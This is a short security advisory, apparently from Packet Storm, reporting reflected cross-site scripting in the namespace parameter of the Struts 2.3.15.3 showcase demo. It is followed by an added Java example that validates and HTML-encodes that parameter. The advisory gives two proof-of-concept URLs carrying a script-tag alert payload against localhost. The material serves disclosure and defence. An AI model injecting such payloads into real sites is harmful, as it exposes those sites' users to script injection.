Struts 2.3.15.3 Cross Site Scripting

2013-10-28T00:00:00
ID PACKETSTORM:123805
Type packetstorm
Reporter Nebula
Modified 2013-10-28T00:00:00

Description

                                        
`*Abstract:*
  
In the latest official release, struts-2.3.15.3, the XSS in the
struts2-showcase.war demo still exists!
  
*Details:*
  
I found an update of the official demo of Struts2, so I did a test. It used
to be able to filter, escape input and escape output, but why didn't it
escape this time?
  
*Proofs of concept:*
  
The namespace parameter of two demo addresses was not fixed:
  
http://127.0.0.1:8080/struts2-07/config-browser/actionNames.action?namespace=  
<script>alert(/xss/);</script>  
  
http://127.0.0.1:8080/struts2-07/config-browser/showConfig.action?namespace=  
<script>alert(/xss/);</script>&actionName=showcase  
  
  
`
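The mitigation for the reflection described above, as an added example that is not part of the original advisory and is not Struts code: the namespace value is checked against an allowlist and HTML-encoded at every point where it is written into the page, including the error path. The class name, method names, markup and the namespace pattern are assumptions made for illustration.

```java
import java.util.regex.Pattern;

/** Added illustration with hypothetical names; not taken from Struts or the config-browser plugin. */
public class NamespaceOutputEncoding {

    // Assumption: a namespace is empty or a path of segments made of letters, digits, '_', '.', '-'.
    private static final Pattern NAMESPACE = Pattern.compile("(/[A-Za-z0-9_.-]+)*/?");

    /** Allowlist check on the request parameter before it is used. */
    static boolean isValidNamespace(String ns) {
        return ns != null && ns.length() <= 256 && NAMESPACE.matcher(ns).matches();
    }

    /** HTML-encode a value for element content or a quoted attribute value. */
    static String escapeHtml(String s) {
        if (s == null) return "";
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    /** Encoding is applied on both branches: a rejected value echoed in an error is still untrusted. */
    static String renderHeading(String ns) {
        if (isValidNamespace(ns)) {
            return "<h3>Actions in namespace: " + escapeHtml(ns) + "</h3>";
        }
        return "<p class=\"error\">Rejected namespace: " + escapeHtml(ns) + "</p>";
    }

    public static void main(String[] args) {
        // Constructed sample inputs; the last is the parameter value shown in the advisory.
        String[] samples = { "/config-browser", "", "<script>alert(/xss/);</script>" };
        for (String s : samples) {
            System.out.println(isValidNamespace(s) + "\t" + renderHeading(s));
        }
    }
}
```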